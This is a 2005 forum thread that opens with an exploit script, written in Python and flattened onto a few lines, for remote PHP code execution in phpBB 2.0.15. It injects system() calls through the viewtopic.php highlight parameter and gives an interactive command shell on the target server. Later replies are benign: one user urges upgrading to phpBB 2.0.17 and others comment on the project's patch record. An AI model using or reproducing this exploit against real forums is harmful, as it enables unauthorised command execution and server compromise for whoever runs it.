[exploit] Phpbb 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit

[RemoteConnection 0]

phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit

ENDTAG = '</g0>'

def makecmd(cmd) linenums:0'>#!/usr/bin/pyth0nprint "\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by rattle@awarenetwork.org" print " well, just because there is none." import sys from urllib2 import Request, urlopenfrom urlparse import urlparse, urlunparsefrom urllib import quote as quote_plusINITTAG = '<g0>'ENDTAG = '</g0>'def makecmd(cmd):return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))_ex = "%sviewtopic.php?t=%s&highlight=%%27."_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."_ex += "printf(" + makecmd(ENDTAG) + ").%%27"def usage():print """Usage: %s <forum> <topic>forum - fully qualified url to the forumexample: % sys.argv[0]; sys.exit(1)if __name__ == '__main__':if len(sys.argv) < 3 or not sys.argv[2].isdigit():usage()else:printurl = sys.argv[1]if url.count("://") == 0: url = "http://" + urlurl = list(urlparse(url))host = url[1]if not host: usage()if not url[0]: url[0] = 'http'if not url[2]: url[2] = '/'url[3] = url[4] = url[5] = ''url = urlunparse(url)if url[-1] != '/': url += '/'topic = quote_plus((sys.argv[2]))while 1:try:cmd = raw_input("[%s]$ " % host).strip()if cmd[-1]==';': cmd=cmd[:-1]if (cmd == "exit"): breakelse: cmd = makecmd(cmd)out = _ex % (url,topic,cmd)try: ret = urlopen(Request(out)).read()except KeyboardInterrupt: continueexcept: passelse:ret = ret.split(INITTAG,1)if len(ret)>1: ret = ret[1].split(ENDTAG,1)if len(ret)>1:ret = ret[0].strip();if ret: print retcontinue;print "EXPLOIT FAILED"except:continue

Notice from cmatcmextra:

Codebox tags used instead of code tags

Edited September 1, 2005 by cmatcmextra (see edit history)

[Dragonfly 0]

YOu could give secutiry updates link of phpbb dot com homepage. Not only phpbb 2.0.15 has security exploits even 2.0.16 also has one or more problem and phpbb has already released 2.0.17 sometime ago fixing all the exploits found so far and have advised all the software users to upgrade their forums/boards as soon as possible. I was updating one of the boards from 2.0.10 to 2.0.17 it took more than 2 hours to finish all the updates and now I can sleep peacefully. Those who haven't updated their boards can look for upgrade mods which is good for those who installed many mods in their boards. Look out for those mods from phpbb dot come homepage.

[Saint_Michael 3]

its amazing i don't know whos coming out with more bugs ipb or phpbb, but yeah you let those at phpbb know about this as well.

[sunny 0]

As with all other software and scripts, PHPbb also has a long history of vulnerabilities. But it is better than others because of quick developer community reponce towards new found security loopholes.PHPbb issues are fixed generally very less time then other systems. and that is why I like PHPbb.For the user, it is always a good practice to bookmark the PHPbb homepage to get the update news at time.